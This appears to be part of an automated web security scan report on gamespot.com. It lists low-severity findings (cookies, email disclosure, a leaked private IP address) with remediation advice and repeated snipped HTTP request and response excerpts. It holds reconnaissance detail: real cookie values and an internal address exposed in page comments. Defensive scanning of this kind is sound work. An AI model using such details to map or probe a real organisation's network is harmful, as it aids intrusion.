The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xbox360/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /xbox360/rpg/falloutnewvegas/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.
Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A/POS=100/PTYPE=6554/REMOTE_AD ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A/POS=100/PTYPE=2000/REMOTE_AD ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A23351%3A71%3A/PAGESTATE=1%7C% ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A23351%3A71%3A/PAGESTATE=1%7C% ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A23351%3A71%3A/PAGESTATE=1%7C7 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=1/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=1%3A23351%3A71%3A/PAGESTATE=1%7C7 ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=31017/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=31017%3A/POS=100/PTYPE=2001/R ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=31017/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=31017%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=31017/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=31017%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/BYPASSKEY=best%2dof%2d2010/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=32502/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=32 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/BYPASSKEY=best%2dof%2d2010/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=32502/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=32 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/BYPASSKEY=best%2dof%2d2010/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=32502/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=32 ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=17856/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=17856%3A/POS=100/PTYPE=6025/R ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=17856/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=17856%3A/POS=100/PTYPE=6025/R ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=17856/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=17856%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=17856/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=17856%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/POS=100/PTYPE=6016/REMOTE_ ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/POS=100/PTYPE=6016/REMOTE_ ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9137/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=920787/DVAR_PUBLISHER=1143/DVAR_GSESRB=E/DVAR_GSDISTRIB=Retail/DVAR_GSMULT ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9137/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=920787/DVAR_PUBLISHER=1143/DVAR_GSESRB=E/DVAR_GSDISTRIB=Retail/DVAR_GSMULT ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9137/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=920787/DVAR_PUBLISHER=1143/DVAR_GSESRB=E/DVAR_GSDISTRIB=Retail/DVAR_GSMULT ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9137/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9137%3A/POS=100/PTYPE=2001/REM ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9137/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9137%3A/PAGESTATE=1%7C%7C%3B%3 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9137/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9137%3A/PAGESTATE=1%7C%7C%3B%3 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9137/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9137%3A/PAGESTATE=1%7C%7C%3B%3 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9137/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9137%3A/PAGESTATE=1%7C%7C%3B%3 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9137/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9137%3A23351%3A71%3A/PAGESTATE ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9137/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9137%3A23351%3A71%3A/PAGESTATE ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9137/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9137%3A23351%3A71%3A/PAGESTATE ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=2521/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=2521%3A/POS=100/PTYPE=2001/REM ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=2521/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=2521%3A/POS=300/PTYPE=2001/REM ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=2521/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=2521%3A/PAGESTATE=1%7C%7C%3B%3 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=2521/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=2521%3A/PAGESTATE=1%7C%7C%3B%3 ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/POS=300/PTYPE=6068/REMOTE_ ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=31016/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=31016%3A/POS=100/PTYPE=2001/R ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=31016/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=31016%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=31016/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=31016%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/POS=300/PTYPE=6038/REMOTE_ ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=31014/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=31014%3A/POS=100/PTYPE=2001/R ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=31014/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=31014%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=31014/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=31014%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=47/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=47%3A/POS=100/PTYPE=6034/REMOTE_ ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=47/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=47%3A/POS=100/PTYPE=6034/REMOTE_ ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=47/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=47%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=47/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=47%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]... 